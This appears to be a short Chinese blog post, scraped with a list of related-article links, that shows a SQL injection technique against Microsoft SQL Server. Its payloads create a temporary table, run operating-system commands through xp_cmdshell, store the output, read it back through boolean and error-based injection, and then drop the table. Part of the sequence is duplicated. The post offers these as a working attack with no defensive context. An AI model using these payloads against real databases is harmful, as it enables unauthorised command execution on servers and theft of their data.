sql server 注入漏洞执行cmd指令并得到回显
2015-12-07 14:26
176 查看
';create table temp(id int identity(1,1),a varchar(8000));-- 创建一个表
';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; -- 执行cmd指令并且插入到表中
' and (select top 1 a from temp where id>5)>0 -- 查询这个表里面的信息,得到cmd指令运行结果
' or (select count(*) from temp)>0 -- 25 得到这个表里面的数据行数
';drop table temp; -- 删除表
';insert into temp exec master.dbo.xp_cmdshell 'dir c:\'; -- 执行cmd指令并且插入到表中
' and (select top 1 a from temp where id>5)>0 -- 查询这个表里面的信息,得到cmd指令运行结果
' or (select count(*) from temp)>0 -- 25 得到这个表里面的数据行数
';drop table temp; -- 删除表
相关文章推荐
- C# 连接mongodb副本集+分片读写分离及学习资料
- mysql数据关联查询及显示问题,一对多查询
- MySQL安装
- 在单节点上安装 Oracle Grid Infrastructure
- MySQL分区表的管理~1
- 回顾Oracle几个用到的基本语句
- 经典SQL语句大全
- Discuz数据库security_failedlog错误及修复
- Oracle数据库横向展示
- 深度解析mysql登录原理
- mySQL RowNum用法
- JDBC连接数据库中CallableStatement执行有参存储过程及注解其他
- redis-cli 命令总结
- Informix数据库软件开发方法与工具
- 实时数据库--概念浅述
- ORACLE数据库开发
- mysql-删除/更新相同的记录的前n条
- MySQL之Xtrabackup备份恢复数据库-简介
- sql 转换 自定义函数
- Hbase(nosql)体系结构有基本操作 笔记八